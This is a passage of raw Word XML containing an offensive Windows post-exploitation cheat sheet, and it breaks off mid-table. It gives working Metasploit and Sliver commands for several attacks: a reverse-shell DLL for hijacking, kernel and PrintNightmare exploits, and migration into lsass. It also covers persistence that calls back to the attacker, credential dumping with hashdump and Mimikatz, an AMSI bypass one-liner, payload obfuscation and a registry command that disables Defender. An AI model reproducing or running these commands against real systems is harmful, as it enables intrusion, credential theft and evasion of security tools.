        <w:t>(Also works for utilman.exe, osk.exe, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07424ADE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="153EC9A5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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24CA6BC0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="0494700F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4.8 – DLL HIJACKING / SIDE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>LOADING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B919E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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42E2DA4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If a SYSTEM process loads a missing DLL from a writable folder (e.g., C:\Program Files\App\):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A99E536" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    1. Identify missing DLLs via Process Monitor (ProcMon) – look for "NAME NOT FOUND".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFB3363" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    2. Generate a malicious DLL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEF56F3" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=X LPORT=Y -f dll -o hijack.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E77708" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    3. Upload it to that path with the expected name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CE1DB6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    4. Restart the service/application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F56A49C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="69F5D82D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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7731895" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="3582C4A0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4.9 – KERNEL EXPLOITS (The Noisy Last Resort)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BE0650" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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9052340" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Run the suggester, then pick a reliable public exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15260F37" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="702276F6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753AAE3B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    run post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673AF8CE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="5C67DBEA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C7B20" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    exploit-suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC294E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="48897565" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Common Windows 10 kernel exploits (check your patch level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C697849" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    - CVE-2021-1732 (Win32k – 20H2/21H1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55386521" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    - CVE-2021-34527 (PrintNightmare – Spooler)  → Service exploit!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C904E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    - CVE-2020-0668 (Service Tracing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E89010F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    - MS16-032 (Secondary Logon Handle – older builds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FA9EE6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    - CVE-2019-0803 (Win32k – 1809)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AEC088" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    - CVE-2018-8120 (Win32k – older)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D1F96" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="705192D5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047AF150" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    use exploit/windows/local/ms16_032_secondary_logon_handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B884E2B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    use exploit/windows/local/ppr_flatten_rec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372BCC18" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    use exploit/windows/local/cve_2021_1732_win32k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264193F4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    (Set SESSION, run)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD5CC4F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="710BD647" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E284AFD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    – No built-in kernel exploit modules. You must upload the compiled .exe for the specific CVE and run it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD1CD04" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload cve-2021-1732.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB2C4BA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute -o cve-2021-1732.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E320F34" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="717E0C7D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>WARNING: Kernel exploits can BSOD the system. Use only in lab or emergency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB20602" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="479D3219" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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497CBD6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="7E73BA03" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4.10 – PRINT SPOOLER (PrintNightmare / EvilSpool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B40D3C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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E6C9248" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If Spooler service is running (it usually is) and you have SeImpersonate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5634CC0A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="42848D73" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>A) PrintNightmare (CVE-2021-1675 / CVE-2021-34527)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72334B3E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Meterpreter: use exploit/windows/local/cve_2021_1675_printnightmare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA7AE4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Sliver: upload SharpPrintNightmare.exe; execute-assembly SharpPrintNightmare.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA94FED" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="466BFB6F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>B) EvilSpool (SpoolSample) – older but still works on some DCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37999DFA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    (Used primarily for domain privilege escalation via RBCD, but can be used for local SYSTEM via relaying).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4E52B2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="26C72618" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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10D3FBC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>PART 5: POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>EXPLOITATION – STABILIZE &amp; PERSIST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3452E10B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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A90435A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="3B74C42A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>5.1 – Confirm SYSTEM Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09964B63" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D6DD6B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF94482" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    getuid   (should say NT AUTHORITY\SYSTEM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC62BFC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    getprivs (to see your full rights)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9226A8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="4DE1D924" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C54194F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715BE6BB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="6DAF7783" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>5.2 – Migrate to a Stable Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88C5DC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>───────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1B9111" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If your shell is in a process that might crash (e.g., payload injected into a user app), migrate to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659914A9" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="3CBA8F48" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C17889C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE09F24" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    migrate &lt;PID_of_winlogon.exe or lsass.exe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D45F314" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="7F8B3FA5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15A709" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B5D51F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    migrate &lt;PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBDB95D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="287CF9FB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>5.3 – Establish Persistence (if required)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8ED9D0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>───────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C46F347" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EFC827" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    run persistence -X -i 60 -p 4444 -r &lt;your_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DE6673" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    (or use exploit/windows/local/persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0CFAEE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="29035C4C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F8A64E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    persistence -m schtask -h &lt;your_ip&gt; -p &lt;port&gt; -o 60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E10B7E1" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="426B1FC3" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>5.4 – Dump Credentials (Pass-the-Hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE45CC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>───────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B8614E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467997AC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BC6D03" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    load kiwi   (Mimikatz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AEE986" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    creds_all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7541A6EC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="72ADA57D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB2B30F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute-assembly SharpDump.exe   (or Mimikatz via sideload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048C09AA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    mimikatz (if extension is loaded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5B6F9D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="4DD59DFF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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71B0FD0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>PART 6: AV / EDR EVASION (OPSEC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043A5FAE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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E7543C4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="03B5A0D5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>6.1 – AMSI Bypass (For PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E7AAB2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>───────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778C6C04" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Run this before any PowerShell script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6118D13C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101FC756" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="2E2EEE3B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Or use the 'amsi-scan-buffer' patch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59762BEB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="257FB216" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>6.2 – Obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDFB60F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57581C8A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Use 'Invoke-Obfuscation' on your PowerShell scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4BB1B9" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>For Sliver, use: generate --tcp --lhost X --lport Y --format exe --encoder xor --iterations 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EDED01" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="66AA47A8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>6.3 – Avoid Dropping Files – Use Memory Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8BE175" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>───────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A550EC8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>- Meterpreter: use powershell / execute -H (hidden) for scripts. For EXEs, use `migrate`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C250138" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>- Sliver: `execute-assembly` is your best friend – run Sharp tools entirely in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACB722" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>- Use `sideload` to inject unmanaged DLLs directly into a remote process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA5B83" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="4D9560FE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>6.4 – Disable Defender (If Admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B6D726" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>──────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F68B5B4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>- Meterpreter: shell reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0F9F9E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>- Sliver: same shell command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B5973" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="22535D95" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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339D792" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>PART 7: TROUBLESHOOTING &amp; FALLBACKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0FEFF5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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7753D7B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="27C4695B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>| Issue                             | Solution                                                                 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350AA173" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>|-----------------------------------|--------------------------------------------------------------------------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E08700" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>| getsystem/elevate returns error   | Manually check SeImpersonate via whoami /priv; use Potato family.       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A7FD1F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
